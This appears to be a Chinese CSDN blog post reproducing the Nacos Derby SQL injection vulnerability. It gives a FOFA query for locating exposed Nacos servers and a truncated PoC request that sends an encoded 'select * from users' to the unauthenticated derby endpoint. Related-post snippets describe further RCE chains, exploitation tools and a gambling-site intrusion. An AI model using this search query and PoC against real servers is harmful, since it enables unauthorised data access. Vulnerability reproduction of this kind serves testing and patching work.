【漏洞复现】Nacos Derby SQL注入漏洞

已于 2024-09-19 01:35:13 修改
阅读量855 收藏 4
点赞数 5
分类专栏: 漏洞复现vs漏洞利用 文章标签: 安全测试 网络安全 HW攻防演练 SQL注入
于 2024-09-19 01:34:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lza20001103/article/details/142347389
版权

Nacos Derby SQL注入漏洞

Nacos Derby SQL注入漏洞(CNVD-2020-67618)是一个重要的安全问题,它涉及到Nacos中使用的Derby数据库存在的SQL注入风险。SQL注入是一种攻击手段,攻击者通过在应用程序的输入字段中插入恶意的SQL代码,从而能够执行未经授权的数据库操作,获取敏感信息,甚至篡改数据。

搜索语法:

Fofa-Query: ip.port=="8848" and title=="HTTP Status 404 – Not Found"

漏洞详情:

1.Nacos服务系统。

2.漏洞POC:

GET /nacos/v1/cs/ops/derby?sql=%73%65%6c%65%63%74%20%2a%20%66%72%6f%6d%20%75%73%65%72%73 HTTP/1.1
Host: {
{Hostname}}
User

炫彩@之星
关注
专栏目录
Nacos Derby 远程命令执行漏洞(QVD-2024-26473)
0xSec
07-19 6469
由于Alibaba Nacos部分版本中derby数据库默认可以未授权访问,恶意攻击者利用此漏洞可以未授权执行SQL语句,最终导致任意代码执行。目前该漏洞PoC已在互联网上公开,鉴于该漏洞影响范围较大,建议尽快做好自查及防护。此漏洞允许未经身份验证的远程攻击者执行任意代码,可能导致数据泄露、服务中断或系统被完全控制。
渗透测试实战-菠菜站渗透测试(Nacos反序列化漏洞利用)_nacos jraft hessian反序列化漏洞
zzz6583zz的博客
08-28 971
成功拿下了菠菜网站的服务器,进行了远程桌面连接,通过最后登录和公网IP的查找也发现该服务器是一台云主机感觉这次渗透一切都太顺利,服务器完全不设防,历史漏洞也没有修复,没什么技术含量,主要是对各种工具的使用,各位大佬当爽文看就行,希望以后大家做渗透测试的时候也都能碰到这样的站点从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。
nacos-SQL注入
最新发布
bmaoHk的博客
10-16 253
nacos是阿里巴巴的一个开源项目,旨在帮助构建云原生应用程序和微服务平台。更多漏洞信息请关注,安全技术达人公众号号。将复现,推送最新漏洞信息。升级到最新版nacos
【工具】Nacos漏洞综合利用工具v6.0
2401_84215240的博客
09-23 1209
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。如有侵权烦请告知,我们会立即删除并致歉。**前言**在攻防演练中,Nacos一直是红队攻击的重点目标之一,红队通常需要快速打点,尽快发现系统中的漏洞,并利用它们获取权限。
Nacos历史漏洞复现(汇总)
qq_55202378的博客
08-18 3954
这个漏洞其实可以说是CVE-2021-29442的更深层次利用,在上文中我们分析了,Derby未授权SQL注入利用的是/derby这个路由,但是限制了语句必须为select开头的即查询语句,而仅仅是查询语句就无法RCE。:nacos带有一个嵌入式的小型数据库derby,而在版本<=1.4.0的默认配置部署nacos的情况下,它无需认证即可被访问,并执行任意sql查询,导致敏感信息泄露。简单来说就是将远程服务器上的jar包导入数据库,就可以动态调用类中的static方法),也就是所谓组合拳RCE。
修复nacos漏洞问题SQL注入CNVD-2020-67618、未授权访问CVE-2021-29441等
kaopuzong的博客
02-06 3021
修复nacos漏洞问题:漏洞1:SQL注入CNVD-2020-67618 漏洞2:未授权访问CVE-2021-29441 漏洞3:token.secret.key默认配置QVD-2023-6271 漏洞4:Jraft Hessian反序列化CNVD-2023-45001
[漏洞复现]Nacos derby注入不出网不落地的内存马利用
LiangYueSec的博客
07-18 1933
[漏洞复现]Nacos derby注入不出网不落地的内存马利用
sql注入漏洞详解
qq_39511050的博客
09-17 1554
sql注入漏洞详解
Nacos漏洞综合利用GUI工具(源码+项目说明)(集成默认口令漏洞SQL注入漏洞、身份认证绕过漏洞的检测).zip
03-05
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,作为参考资料学习借鉴。 3、本资源作为“参考资料”如果需要实现其他功能,需要能看懂代码,并且热爱钻研,自行调试。 Nacos漏洞综合利用GUI工具(源码+项目说明)(集成默认口令漏洞SQL注入漏洞、身份认证绕过漏洞、反序列化漏洞的检测及其利用).zip
web渗透测试漏洞复现nacos未授权访问漏洞复现并getshell
HACKONE的博客
03-30 1092
nacos未授权访问。
SQL注入漏洞修复方案及代码审计
fengxioabai的博客
03-18 1114
⼀个成功的SQL注⼊攻击可以从 数据库中获取敏感 数据、修改数据库数据(插⼊/更新/删除)、执⾏数据库管理操作 (如关闭数据库管理系统)、恢 复存在于数据库⽂件系统中的指定⽂件 内容,在某些情况下能对操作系统发布命令。由于⽤户的输⼊,也是SQL语句的⼀部分,所以 攻击者可以利⽤这部分可以控制的内容,注⼊⾃⼰定义的语句,改变SQL语句 执⾏逻辑,让数据库执⾏任意⾃⼰需要 的指令。通过控制部分SQL语句,攻击者可以查询数据库中任何⾃⼰需要的数据,利⽤数据库的⼀ 些特性,可以直接 获取数据库服务器的系统权限。
nacos漏洞小结
qq_61475980的博客
07-01 4044
Alibaba Nacos是阿里巴巴推出来的一个新开源项目,是一个更易于的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。在路径后面加上可以获取到已有的用户名和密码,可以把User-Agent头改为Nacos-Server,如图更改提交方式为POST, 访问新建一个账号test111,可以看到创建用户成功,如图更改提交方式为DELETE, 访问可以看到用户删除成功,如图更改提交方式为。
渗透测试--Nacos系统
qq_53003652的博客
11-25 2968
nacos是指,阿里为 SpringCloud 贡献了一个子项目,叫做 SpringCloud Alibaba,其中包括了微服务开发中的几个基础组件,Nacos 就是此项目中的一项技术。可以实现服务注册中心、分布式配置中心。针对微服务架构中的服务发现、配置管理、服务治理的综合型解决方案。Nacos攻防实战中也是经常遇到,大多数布置是在内网,但是公网上也是有不少的,因为其存在多个漏洞,师傅们也是通过nacos拿下了不少分数。
渗透测试实战-菠菜站渗透测试(Nacos反序列化漏洞利用)
网安日记本的博客
08-19 2310
渗透测试实战-菠菜站渗透测试(Nacos Jraft Hessian反序列化漏洞利用)
Nacos Derby从SQL到RCE
好记性不如烂笔头
07-16 2836
derby路径下的函数如下,该方法主要用于Derby数据库的查询操作,确保只执行SELECT语句,并在必要时添加分页限制。如果当前存储模式不是 Derby 或者遇到异常,方法会返回相应的错误信息。在Java应用程序中使用JDBC API调用Derby的存储过程和函数会触发相应的函数执行。
seata分布式事务注入nacos
qq_35059264的博客
08-06 411
勿以浮沙筑高台 Seata分布式事务 Seata和Nacos整合 Git地址:https://github.com/seata/seata 1.在Nacos中新增命名空间 2.下载Seata 下载地址:https://github.com/seata/seata/releases/tag/v1.4.2 3.修改配置文件 进入config目录下修改配置文件registry.conf为以下内容,主要是配置注册中心和配置中心都是我们的nacos,命名空间为我们注册的命名空间9ef06f4f-4ac5-4f2e
Nacos系列之设置MySQL数据库存储
小狐狸和小兔子
08-20 2116
Nacos设置MySQL数据库存储 首先保证你有jdk8+的环境,mysql5.6.5+ 一、下载nacos服务包,解压,最新版本1.3.2,下载地址 https://github.com/alibaba/nacos/releases 二、在本地数据库中建立一个新的数据库,我这里名字叫nacos_config,执行解压包中的conf/nacos-mysql.sql文件 三、打开conf/application.properties,找到MySQL的相关设置,放开原有注释,修改部分配置即可 #******
nacos derbynacos mysql
07-23
Nacos是一个开源的分布式配置中心和服务发现框架,主要用于管理和存储应用配置、服务元数据等信息。Derby和MySQL则是两种不同的数据库管理系统。 Derby,也被称为Apache Jakarta Derby,它是一个小型的关系型数据库引擎,属于Java标准版的一部分,通常用于轻量级应用或者测试环境,因为其无需外部服务器,嵌入式在Java应用中运行。 MySQL,则是一款流行的开源关系型数据库系统,提供高性能、高可用性和可伸缩性,适用于生产级别的应用。MySQL支持网络连接,允许远程访问和管理,并广泛应用于企业级和互联网服务中。 当涉及到Nacos的数据存储时,Nacos默认使用的是内置的内存存储机制,但如果需要持久化存储配置,可以选择使用如MySQL这样的外部RDBMS作为持久化存储后端。这有助于将Nacos部署在大规模环境中,提高数据可靠性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值